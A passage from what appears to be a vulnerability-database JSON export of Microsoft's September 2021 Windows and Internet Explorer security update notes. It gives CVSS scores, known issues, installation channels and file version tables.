(OS Build 18363.1801)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005566", "href": "https://support.microsoft.com/en-us/help/5005566", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:05", "description": "None\n**7/13/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that prevents users from tracking Distributed Component Object Model (DCOM) activation failures.\n * Addresses an issue that might cause a memory leak to occur during prolonged Remote Desktop audio redirection.\n * Addresses an issue that causes a non-paged memory leak in the **FLTMGR.SYS** driver. This issue occurs because of a reference count issue in the **DFS.SYS** driver during cluster failover. As a result, the system might become unresponsive.\n * Addresses an issue with using the **robocopy **command with the backup option (**/B**) to fix copy failures. This issue occurs when the source files contain Alternate Data Streams (ADS) or Extended Attributes (EA) and the destination is an Azure Files share.\n * Addresses an issue that causes Authentication Mechanism Assurance (AMA) to stop working. This issue occurs when you migrate to Windows Server 2016 (or newer versions of Windows) and when using AMA in conjunction with certificates from Windows Hello for Business.\n * Addresses an issue that prevents you from writing to a Windows Management Instrumentation (WMI) repository after a low memory condition occurs.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005573 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note **The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006669. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of KB5005573 are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006669. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations. | This issue is resolved in KB5006669. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **&gt; **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5010359. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5005698) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005573>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005573](<https://download.microsoft.com/download/a/d/7/ad771634-3af1-42dd-8d0f-12af05be853d/5005573.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005573 (OS Build 14393.4651)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005573", "href": "https://support.microsoft.com/en-us/help/5005573", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:04", "description": "None\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that causes PowerShell to create an infinite number of child directories. This issue occurs when you use the PowerShell **Move-Item** command to move a directory to one of its children. As a result, the volume fills up and the system stops responding.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n### Windows 10 servicing stack update - 17763.2170\n\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. \n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| This issue is addressed by updates released June 11, 2019 and later. We recommend you install the latest security updates for your device. Customers installing Windows Server 2019 using media should install the latest [Servicing Stack Update (SSU)](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) before installing the language pack or other optional components. If using the [Volume Licensing Service Center (VLSC)](<https://www.microsoft.com/licensing/servicecenter/default.aspx>), acquire the latest Windows Server 2019 media available. The proper order of installation is as follows:\n\n 1. Install the latest prerequisite SSU, currently [KB5005112](<https://support.microsoft.com/help/5005112>)\n 2. Install optional components or language packs\n 3. Install latest cumulative update\n**Note** Updating your device will prevent this issue, but will have no effect on devices already affected by this issue. If this issue is present in your device, you will need to use the workaround steps to repair it.**Workaround:**\n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/windows/manage-the-input-and-display-language-settings-in-windows-12a10cb4-8626-9b77-0ccb-5013e0c7c7a2>).\n 2. Click **Check for Updates **and install the April 2019 Cumulative Update or later. For instructions, see [Update Windows 10](<https://support.microsoft.com/windows/update-windows-3c5ae7fc-9fb6-9af1-1984-b5e0412c556a>).\n**Note **If reinstalling the language pack does not mitigate the issue, use the In-Place-Upgrade feature. For guidance, see [How to do an in-place upgrade on Windows](<https://docs.microsoft.com/troubleshoot/windows-server/deployment/repair-or-in-place-upgrade>), and [Perform an in-place upgrade of Windows Server](<https://docs.microsoft.com/windows-server/get-started/perform-in-place-upgrade>). \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005568 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5005625 \nAfter installing this or a later update, installation of printers using Internet Printing Protocol (IPP) might not complete successfully. Devices which had connected to and installed the printer prior to the installation of KB5005568 are unaffected and print operations to that printer will succeed as usual.**Note** IPP is not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006744. \nAfter installing KB5005102, Windows Server 2019 virtual machines (VMs) employing Software Defined Networks (SDN) or traditional multi-tenant RRAS gateways may lose connectivity with external networks using Gateway connections. Installing the August preview or later update will not affect Windows Server 2019 hosts, Network Controller VMs, and Software Load Balancer VMs.| This issue is resolved in KB5006672. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of KB5005625 are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006672. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006672. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **&gt; **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:You **must **install the August 10, 2021 SSU (KB5005112) before installing the LCU. **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005568>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005568](<https://download.microsoft.com/download/c/8/b/c8b9a4f6-1a3f-48da-8941-518598038d33/5005568.csv>).For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 17763.2170](<https://download.microsoft.com/download/0/0/5/005a59ce-1fe1-4dc4-8460-4a56b7c21e38/SSU_version_17763_2170.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005568 (OS Build 17763.2183)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005568", "href": "https://support.microsoft.com/en-us/help/5005568", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:02", "description": "None\n## **Summary**\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>).Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n\n**Important: **\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The September 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your update management and compliance toolsets.\n\nThis article applies to the following: \n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n\n**Important: **\n\n * The fixes that are included in this update are also included in the September 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup from September 2021 (or a later month) is already installed. This is because that update contains all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the September 2021 Security Only Quality Update, and the September 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## **Known issues in this security update**\n\nWe are currently not aware of any issues in this update.\n\n## **How to get and install this update**\n\n**Before installing this update**To install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the July 13, 2021 SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>).\n * Install the Extended Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. \n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.**Important **You must restart your device after you install these required updates.**Install this update**To install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other following options. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005563>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Updates \n \n## **File information**\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### **Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 